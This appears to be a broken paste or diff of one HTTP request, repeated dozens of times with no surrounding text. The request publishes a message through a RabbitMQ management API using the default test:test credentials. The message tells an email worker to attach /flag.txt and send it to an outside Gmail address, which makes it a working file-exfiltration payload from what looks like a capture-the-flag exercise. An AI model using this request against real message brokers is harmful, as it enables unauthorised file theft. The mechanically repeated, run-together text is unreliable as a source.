-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
